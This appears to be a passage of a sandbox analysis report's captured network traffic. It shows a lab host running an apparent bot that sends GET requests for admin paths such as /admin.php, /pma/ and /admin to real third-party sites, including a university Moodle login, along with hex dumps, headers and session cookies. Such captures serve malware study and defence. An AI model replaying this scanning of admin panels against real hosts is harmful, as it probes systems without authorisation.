                                                                                                                                                                                                                                                                                                                                                                Data Raw: 38 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 59 7b 6f db c8 11 ff bb 06 f2 1d f6 98 a8 b6 01 53 8c 2c 3b b5 6c 49 81 2e 76 d0 00 6d 1c b4 77 7d 20 08 8c 15 b9 92 18 53 24 cb 87 25 5d 71 80 71 69 12 3b b9 c4 0d f2 b8 5c ec 3c 7b 49 ef 9a c6 76 0f d7 c6 e7 c4 f1 87 39 51 8f bf ee 2b 74 96 94 64 52 a2 44 d9 71 48 5b 22 77 67 67 7e 3b 3b b3 33 3b 8a 7f 34 3d 7b ea 93 3f 9f 9b 41 39 23 2f 25 8f 0c c4 e9 37 92 b0 9c 4d 30 9f e5 d8 53 67 19 bb 91 60 81 7e e7 89 81 11 9f c3 9a 4e 8c 04 f3 e9 27 a7 d9 09 bb df 10 0d 89 24 eb 4f ff 5b 7f f8 ac bc 75 c3 7a 75 df 5a fb 36 ce 39 cd d0 2f 89 f2 3c ca 69 24 93 60 38 4e c5 72 38 8d 45 c1 0c f3 4a 9e 53 55 8d e8 9c 6e 60 43 e4 39 31 8f b3 f0 96 c1 0b 22 af c8 61 f8 60 90 46 a4 04 a3 e7 14 cd e0 4d 03 d1 76 a6 c5 d2 e9 33 4a 12 d1 73 84 18 0c 32 4a 2a 49 30 06 29 1a 1c af eb 4c 3f 32 81 8e 23 9a a6 68 73 58 92 c2 f0 76 d2 48 8c 1e 8f 44 8f 47 47 23 a3 b1 e8 98 2d ed 23 96 3d 2f 66 90 64 a0 33 33 28 76 81 36 e9 bc 26 aa 86 5b e2 45 bc 80 9d 56 06 e9 1a 1f 20 f7 a2 ce a9 92 99 e5 a8 c2 c7 c3 17 75 26 19 e7 9c d1 b6 c0 f3 44 16 c4 cc 05 96 75 c9 72 98 b6 73 49 9b 9e 19 b4 73 ea 3e d6 c8 89 9a a0 62 cd 28 71 74 81 89 c6 e5 15 c1 94 c8 9c f3 06 9c 3a 54 e1 66 cc 35 ad 22 ad 08 25 c4 4b 58 d7 13 8c 8d 83 1d 3b ee a8 4d 10 17 90 28 24 18 41 e1 e7 f2 58 b4 57 0e c1 15 77 24 34 07 e5 04 96 f6 c2 2b c1 5a 46 2c 32 f6 20 87 a6 39 c4 1e 86 9b 23 32 2c 35 04 56 52 b2 0a a2 1f 7b 2b 5d 32 5d 1a 67 50 31 2f c9 54 82 61 a8 93 1c 57 28 14 c2 85 68 58 d1 b2 5c 24 16 8b 71 45 aa 7c 3a 2b ec 96 22 e3 85 a6 1c 78 d4 fb 64 b2 c7 c0 0b 55 20 19 d6 e6 68 6a 1a 91 c1 34 72 22 34 29 bc 49 39 c2 e3 69 fa d8 c2 cf 24 cb 5b 6f c0 91 bc 90 6c 8e 3a 18 53 93 a9 4e 60 dd b0 41 ec 15 81 f6 76 5a aa f8 36 f9 39 ac b3 aa 29 49 82 52 90 59 5d 25 bc 88 3b 50 db 63 5b c8 5b d4 30 3c 00 b6 d7 d0 c1 0f b1 96 a5 5b c4 9c 4e a4 0c 78 03 75 d1 04 93 c6 fc 7c 56 53 4c 59 60 79 45 52 b4 49 a4 65 d3 43 d1 13 23 c8 f9 1f 9e 42 ae f6 d1 08 34 36 3f 86 a7 98 24 8a 93 bc d7 00 fc 38 ab 8a 2e 1a a2 22 4f 22 76 22 a6 16 11 3b 36 ae 16 a7 a8 a2 48 3e 59 dd b9 55 5d bd 8f 3a b5 db ae b5 e6 dc 11 56 55 d6 d4 a4 96 24 41 d4
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 89aY{oS,;lI.vmw} S$%]qqi;\<{Iv9Q+tdRDqH["wgg~;;3;4={?A9#/%7M0Sg`~N'$O[uzuZ69/<i$`8Nr8EJSUn`C91"a`FMv3Js2J*I0)L?2#hsXvHDGG#-#=/fd33(v6&[EV u&DursIs>b(qt:Tf5"%KX;M($AXWw$4+ZF,2 9#2,5VR{+]2]gP1/TaW(hX\$qE|:+"xdU hj4r"4)I9i$[ol:SN`AvZ69)IRY]%;Pc[[0<[Nxu|VSLY`yERIeC#B46?$8."O"v";6H>YU]:VU$A
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.274878979 CET1280INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: W/"60fffc02-1d60"
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 27 Jul 2021 12:28:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900820354659383301
                                                                                                                                                                                                                                                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BAIDUID=CAFEC4A3F3092B6753C1F1957D1423D5:FG=1; expires=Tue, 04-Feb-25 11:16:08 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900820354659383301
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW+iw9QE0WbCsGSw==
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 38 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 59 7b 6f db c8 11 ff bb 06 f2 1d f6 98 a8 b6 01 53 8c 2c 3b b5 6c 49 81 2e 76 d0 00 6d 1c b4 77 7d 20 08 8c 15 b9 92 18 53 24 cb 87 25 5d 71 80 71 69 12 3b b9 c4 0d f2 b8 5c ec 3c 7b 49 ef 9a c6 76 0f d7 c6 e7 c4 f1 87 39 51 8f bf ee 2b 74 96 94 64 52 a2 44 d9 71 48 5b 22 77 67 67 7e 3b 3b b3 33 3b 8a 7f 34 3d 7b ea 93 3f 9f 9b 41 39 23 2f 25 8f 0c c4 e9 37 92 b0 9c 4d 30 9f e5 d8 53 67 19 bb 91 60 81 7e e7 89 81 11 9f c3 9a 4e 8c 04 f3 e9 27 a7 d9 09 bb df 10 0d 89 24 eb 4f ff 5b 7f f8 ac bc 75 c3 7a 75 df 5a fb 36 ce 39 cd d0 2f 89 f2 3c ca 69 24 93 60 38 4e c5 72 38 8d 45 c1 0c f3 4a 9e 53 55 8d e8 9c 6e 60 43 e4 39 31 8f b3 f0 96 c1 0b 22 af c8 61 f8 60 90 46 a4 04 a3 e7 14 cd e0 4d 03 d1 76 a6 c5 d2 e9 33 4a 12 d1 73 84 18 0c 32 4a 2a 49 30 06 29 1a 1c af eb 4c 3f 32 81 8e 23 9a a6 68 73 58 92 c2 f0 76 d2 48 8c 1e 8f 44 8f 47 47 23 a3 b1 e8 98 2d ed 23 96 3d 2f 66 90 64 a0 33 33 28 76 81 36 e9 bc 26 aa 86 5b e2 45 bc 80 9d 56 06 e9 1a 1f 20 f7 a2 ce a9 92 99 e5 a8 c2 c7 c3 17 75 26 19 e7 9c d1 b6 c0 f3 44 16 c4 cc 05 96 75 c9 72 98 b6 73 49 9b 9e 19 b4 73 ea 3e d6 c8 89 9a a0 62 cd 28 71 74 81 89 c6 e5 15 c1 94 c8 9c f3 06 9c 3a 54 e1 66 cc 35 ad 22 ad 08 25 c4 4b 58 d7 13 8c 8d 83 1d 3b ee a8 4d 10 17 90 28 24 18 41 e1 e7 f2 58 b4 57 0e c1 15 77 24 34 07 e5 04 96 f6 c2 2b c1 5a 46 2c 32 f6 20 87 a6 39 c4 1e 86 9b 23 32 2c 35 04 56 52 b2 0a a2 1f 7b 2b 5d 32 5d 1a 67 50 31 2f c9 54 82 61 a8 93 1c 57 28 14 c2 85 68 58 d1 b2 5c 24 16 8b 71 45 aa 7c 3a 2b ec 96 22 e3 85 a6 1c 78 d4 fb 64 b2 c7 c0 0b 55 20 19 d6 e6 68 6a 1a 91 c1 34 72 22 34 29 bc 49 39 c2 e3 69 fa d8 c2 cf 24 cb 5b 6f c0 91 bc 90 6c 8e 3a 18 53 93 a9 4e 60 dd b0 41 ec 15 81 f6 76 5a aa f8 36 f9 39 ac b3 aa 29 49 82 52 90 59 5d 25 bc 88 3b 50 db 63 5b c8 5b d4 30 3c 00 b6 d7 d0 c1 0f b1 96 a5 5b c4 9c 4e a4 0c 78 03 75 d1 04 93 c6 fc 7c 56 53 4c 59 60 79 45 52 b4 49 a4 65 d3 43 d1 13 23 c8 f9 1f 9e 42 ae f6 d1 08 34 36 3f 86 a7 98 24 8a 93 bc d7 00 fc 38 ab 8a 2e 1a a2 22 4f 22 76 22 a6 16 11 3b 36 ae 16 a7 a8 a2 48 3e 59 dd b9 55 5d bd 8f 3a b5 db ae b5 e6 dc 11 56 55 d6 d4 a4 96 24 41 d4
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 89aY{oS,;lI.vmw} S$%]qqi;\<{Iv9Q+tdRDqH["wgg~;;3;4={?A9#/%7M0Sg`~N'$O[uzuZ69/<i$`8Nr8EJSUn`C91"a`FMv3Js2J*I0)L?2#hsXvHDGG#-#=/fd33(v6&[EV u&DursIs>b(qt:Tf5"%KX;M($AXWw$4+ZF,2 9#2,5VR{+]2]gP1/TaW(hX\$qE|:+"xdU hj4r"4)I9i$[ol:SN`AvZ69)IRY]%;Pc[[0<[Nxu|VSLY`yERIeC#B46?$8."O"v";6H>YU]:VU$A


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                471192.168.2.66456664.190.63.13680
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.478511095 CET225OUTGET /admin.php?sub1=20240205-2216-0830-9373-ed2bb15864e8 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ww16.followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.688138008 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                472192.168.2.66473164.190.63.11180
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.548686981 CET163OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: foros.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.758327007 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                473192.168.2.66512754.71.181.16080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.331856966 CET176OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucivirtual.uci.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.503741026 CET365INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Location: http://ucivirtual.uci.edu.mx/admin/
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:25 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 158
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 75 63 69 76 69 72 74 75 61 6c 2e 75 63 69 2e 65 64 75 2e 6d 78 2f 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="http://ucivirtual.uci.edu.mx/admin/">here</a></body>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.503876925 CET177OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucivirtual.uci.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.806559086 CET960INHTTP/1.1 303 See Other
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-mx
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: http://ucivirtual.uci.edu.mx/admin/index.php?cache=1
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.2.7
                                                                                                                                                                                                                                                                                                                                                                X-Accel-Buffering: no
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: MoodleSession=0a9fols7vpjhrg7hr2aglohso1; path=/
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:26 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 499
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 20 6c 61 6e 67 3d 22 65 73 2d 6d 78 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 73 2d 6d 78 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 0a 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 63 69 6f 6e 61 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 65 6d 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 22 3e 45 73 74 61 20 70 c3 a1 67 69 6e 61 20 64 65 62 65 72 c3 ad 61 20 72 65 64 69 72 65 63 63 69 6f 6e 61 72 20 61 75 74 6f 6d c3 a1 74 69 63 61 6d 65 6e 74 65 2e 20 53 69 20 6e 6f 20 6f 63 75 72 72 65 20 6e 61 64 61 2c 20 70 6f 72 20 66 61 76 6f 72 20 75 74 69 6c 69 63 65 20 65 6c 20 65 6e 6c 61 63 65 20 64 65 20 63 6f 6e 74 69 6e 75 61 72 20 71 75 65 20 61 70 61 72 65 63 65 20 6d c3 a1 73 20 61 62 61 6a 6f 2e 3c 62 72 20 2f 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 75 63 69 76 69 72 74 75 61 6c 2e 75 63 69 2e 65 64 75 2e 6d 78 2f 61 64 6d 69 6e 2f 69 6e 64 65 78 2e 70 68 70 3f 63 61 63 68 65 3d 31 22 3e 43 6f 6e 74 69 6e 75 61 72 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="es-mx" xml:lang="es-mx"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Redireccionar</title></head><body><div style="margin-top: 3em; margin-left:auto; margin-right:auto; text-align:center;">Esta pgina debera redireccionar automticamente. Si no ocurre nada, por favor utilice el enlace de continuar que aparece ms abajo.<br /><a href="http://ucivirtual.uci.edu.mx/admin/index.php?cache=1">Continuar</a></div></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.064337969 CET244OUTGET /admin/index.php?cache=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucivirtual.uci.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: MoodleSession=0a9fols7vpjhrg7hr2aglohso1
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.376604080 CET882INHTTP/1.1 303 See Other
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-mx
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: http://ucivirtual.uci.edu.mx/login/index.php
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.2.7
                                                                                                                                                                                                                                                                                                                                                                X-Accel-Buffering: no
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:26 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 491
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 20 6c 61 6e 67 3d 22 65 73 2d 6d 78 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 73 2d 6d 78 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 0a 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 63 69 6f 6e 61 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 65 6d 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 22 3e 45 73 74 61 20 70 c3 a1 67 69 6e 61 20 64 65 62 65 72 c3 ad 61 20 72 65 64 69 72 65 63 63 69 6f 6e 61 72 20 61 75 74 6f 6d c3 a1 74 69 63 61 6d 65 6e 74 65 2e 20 53 69 20 6e 6f 20 6f 63 75 72 72 65 20 6e 61 64 61 2c 20 70 6f 72 20 66 61 76 6f 72 20 75 74 69 6c 69 63 65 20 65 6c 20 65 6e 6c 61 63 65 20 64 65 20 63 6f 6e 74 69 6e 75 61 72 20 71 75 65 20 61 70 61 72 65 63 65 20 6d c3 a1 73 20 61 62 61 6a 6f 2e 3c 62 72 20 2f 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 75 63 69 76 69 72 74 75 61 6c 2e 75 63 69 2e 65 64 75 2e 6d 78 2f 6c 6f 67 69 6e 2f 69 6e 64 65 78 2e 70 68 70 22 3e 43 6f 6e 74 69 6e 75 61 72 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="es-mx" xml:lang="es-mx"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Redireccionar</title></head><body><div style="margin-top: 3em; margin-left:auto; margin-right:auto; text-align:center;">Esta pgina debera redireccionar automticamente. Si no ocurre nada, por favor utilice el enlace de continuar que aparece ms abajo.<br /><a href="http://ucivirtual.uci.edu.mx/login/index.php">Continuar</a></div></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.377783060 CET236OUTGET /login/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucivirtual.uci.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: MoodleSession=0a9fols7vpjhrg7hr2aglohso1
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.810662985 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, pre-check=0, post-check=0, max-age=0, no-transform
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-mx
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.2.7
                                                                                                                                                                                                                                                                                                                                                                Content-Script-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                Content-Style-Type: text/css
                                                                                                                                                                                                                                                                                                                                                                X-UA-Compatible: IE=edge
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:27 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 29840
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 73 2d 6d 78 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 73 2d 6d 78 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 55 43 49 20 56 69 72 74 75 61 6c 3a 20 49 6e 67 72 65 73 61 72 20 61 6c 20 73 69 74 69 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 75 63 69 76 69 72 74 75 61 6c 2e 75 63 69 2e 65 64 75 2e 6d 78 2f 74 68 65 6d 65 2f 69 6d 61 67 65 2e 70 68 70 2f 62 6f 6f 73 74 2f 74 68 65 6d 65 2f 31 36 35 36 36 33 34 30 36 30 2f 66 61 76 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6d 6f 6f 64 6c 65 2c 20 55 43 49 20 56 69 72 74 75 61 6c 3a 20 49 6e 67 72 65 73 61 72 20 61 6c 20 73 69 74 69 6f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 75 63 69 76 69 72 74 75 61 6c 2e 75 63 69 2e 65 64 75 2e 6d 78 2f 74 68 65 6d 65 2f 79 75 69 5f 63 6f 6d 62 6f 2e 70 68 70 3f 72 6f 6c 6c 75 70 2f 33 2e 31 37 2e 32 2f 79 75 69 2d 6d 6f 6f 64 6c 65 73 69 6d 70 6c 65 2d 6d 69 6e 2e 63 73 73 22 20 2f 3e 3c 73 63 72 69 70 74 20 69 64 3d 22 66 69 72 73 74 74 68 65 6d 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 2f 2a 2a 20 52 65 71 75 69 72 65 64 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 66 69 78 20 73 74 79 6c 65 20 69 6e 63 6c 75 73 69 6f 6e 20 70 72 6f 62 6c 65 6d 73 20 69 6e 20 49 45 20 77 69 74 68 20 59 55 49 20 2a 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 75 63 69 76 69 72 74 75 61 6c 2e 75 63 69 2e 65 64 75 2e 6d 78 2f 74 68 65 6d 65 2f 73 74 79 6c 65 73 2e 70 68 70 2f 62 6f 6f 73 74 2f 31 36 35 36 36 33 34 30 36 30 5f 31 2f 61 6c 6c 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 4d 20 3d 20 7b 7d 3b 20 4d 2e 79 75 69 20 3d 20 7b 7d 3b 0a 4d 2e 70 61 67 65 6c 6f 61 64 73 74 61 72 74 74 69
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr" lang="es-mx" xml:lang="es-mx"><head> <title>UCI Virtual: Ingresar al sitio</title> <link rel="shortcut icon" href="http://ucivirtual.uci.edu.mx/theme/image.php/boost/theme/1656634060/favicon" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="keywords" content="moodle, UCI Virtual: Ingresar al sitio" /><link rel="stylesheet" type="text/css" href="http://ucivirtual.uci.edu.mx/theme/yui_combo.php?rollup/3.17.2/yui-moodlesimple-min.css" /><script id="firstthemesheet" type="text/css">/** Required in order to fix style inclusion problems in IE with YUI **/</script><link rel="stylesheet" type="text/css" href="http://ucivirtual.uci.edu.mx/theme/styles.php/boost/1656634060_1/all" /><script type="text/javascript">//<![CDATA[var M = {}; M.yui = {};M.pageloadstartti
